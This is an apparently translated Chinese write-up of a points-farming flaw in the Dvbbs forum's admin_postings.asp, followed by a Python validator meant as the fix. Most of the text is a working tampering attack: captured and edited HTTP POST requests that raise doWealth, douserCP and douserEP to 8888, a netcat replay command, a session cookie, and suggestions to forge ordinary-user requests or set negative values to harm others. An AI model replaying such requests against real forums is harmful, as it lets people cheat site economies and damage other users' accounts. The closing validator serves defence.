Dvbbs (动网论坛) points and experience farming vulnerability
Dvbbs does not validate admin_postings.asp strictly: when promoting a post, you can specify the numbers yourself and thereby farm points, experience and charm.
For example, I have a post:
http://127.0.0.1/dispbbs.asp?boardID=30&ID=26954&page=1
Then I promote this post:
http://127.0.0.1/admin_postings.asp?action=提升&BoardID=30&ID=26954
By default the highest promotion amount is 50, as shown in the figure.
At this point we use WSockExpert to capture the request. The captured packet is:
POST /admin_postings.asp?action=uptopic HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://127.0.0.1/admin_postings.asp?action=提升&BoardID=30&ID=26954
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=617&usercookies=2&password=hjf87126ffz2C3g7y&userhidden=1&userclass=%B0%E6%D6%F7&username=fhod&StatUserID=6127457519; style=null; ASPSESSIONIDCQTDACAT=JHKDJPECDFDKJHDABKIGCLEM; Dvbbs=; upNum=0
title=%BA%C3%CE%C4%D5%C2&content=%BA%C3&doWealth=50&douserCP=50&douserEP=50&ID=26954&replyID=&boardID=30&msg=&submit=%C8%B7%C8%CF%B2%D9%D7%F7
Now we modify it.
The values to change are in this segment:
doWealth=50&douserCP=50&douserEP=50
Change them to any number you like. Here I changed them to doWealth=8888&douserCP=8888&douserEP=8888 for good luck, haha.
Because the numbers changed, the body length also changed: I added 6 characters, which is 6 bytes, so the original
Content-Length: 141
becomes
Content-Length: 147
The finished request is:
POST /admin_postings.asp?action=uptopic HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://127.0.0.1/admin_postings.asp?action=提升&BoardID=30&ID=26954
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 147
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=617&usercookies=2&password=hjf87126ffz2C3g7y&userhidden=1&userclass=%B0%E6%D6%F7&username=fhod&StatUserID=6127457519; style=null; ASPSESSIONIDCQTDACAT=JHKDJPECDFDKJHDABKIGCLEM; Dvbbs=; upNum=0
title=%BA%C3%CE%C4%D5%C2&content=%BA%C3&doWealth=8888&douserCP=8888&douserEP=8888&ID=26954&replyID=&boardID=30&msg=&submit=%C8%B7%C8%CF%B2%D9%D7%F7
Then submit it with nc:
c:\nc 127.0.0.1 80 <1.txt
Submit it a few times and the result is as shown in the figure.
This test was done as a moderator; ordinary users have not been tested yet. My own idea is this: set up a BBS locally, log in as a moderator and capture the cookie packet, then log in to the forum as an ordinary user, post and capture a packet, combine and modify the two packets, and submit. If admin_postings.asp really is not validated strictly, this should achieve the same result. The vulnerability is not of much use, but for forums that require a certain number of coins, charm or experience points before a post can be viewed, it is very handy. Of course, if you want to mess with someone, you can change the numbers to negative values, but remember to set Content-Length: correctly.
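The root cause is that the server accepts the three counters exactly as the browser sends them; the limit of 50 exists only in the form. The following is an added example, not code from Dvbbs, of the server-side check the uptopic handler should perform on the POST body: parse the form, require each of doWealth, douserCP and douserEP to be a plain integer in the range 1..50, and reject anything else (the field names and the value 50 come from the captured request above; treating 50 as the server-side ceiling, and the function names, are assumptions). Who is allowed to promote a post must also be decided server-side, not from the userclass value carried in the cookie.

```python
import re
from urllib.parse import parse_qs

# Fields the uptopic handler reads from the POST body (from the capture above).
# The ceiling of 50 is what the form offers; enforcing it on the server is the
# assumption this example makes.
PROMOTION_FIELDS = ("doWealth", "douserCP", "douserEP")
MAX_PROMOTION = 50
PLAIN_INTEGER = re.compile(r"[0-9]{1,6}")  # no sign, no decimals, no unicode digits


def validate_promotion(body: str) -> dict:
    """Parse a urlencoded POST body and return the three counters as ints.

    Raises ValueError if a field is missing, repeated, not a plain integer,
    or outside 1..MAX_PROMOTION. Edited values such as 8888 or -5 are refused
    whether or not the client patched Content-Length to match.
    """
    params = parse_qs(body, keep_blank_values=True)
    result = {}
    for field in PROMOTION_FIELDS:
        values = params.get(field)
        if not values or len(values) != 1:
            raise ValueError(f"{field}: missing or repeated")
        raw = values[0]
        if not PLAIN_INTEGER.fullmatch(raw):
            raise ValueError(f"{field}: not a plain integer: {raw!r}")
        value = int(raw)
        if not 1 <= value <= MAX_PROMOTION:
            raise ValueError(f"{field}: {value} outside 1..{MAX_PROMOTION}")
        result[field] = value
    return result


def is_valid_promotion(body: str) -> bool:
    """True if the body would be accepted by validate_promotion."""
    try:
        validate_promotion(body)
        return True
    except ValueError:
        return False


# Sample bodies: the parameters of the captured request above, and the
# edited copy the article submits (constructed here by substitution).
ORIGINAL_BODY = ("title=%BA%C3%CE%C4%D5%C2&content=%BA%C3&doWealth=50&douserCP=50"
                 "&douserEP=50&ID=26954&replyID=&boardID=30&msg=&submit=x")
EDITED_BODY = ORIGINAL_BODY.replace("=50", "=8888")
```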
- Article author: 福州军威计算机技术有限公司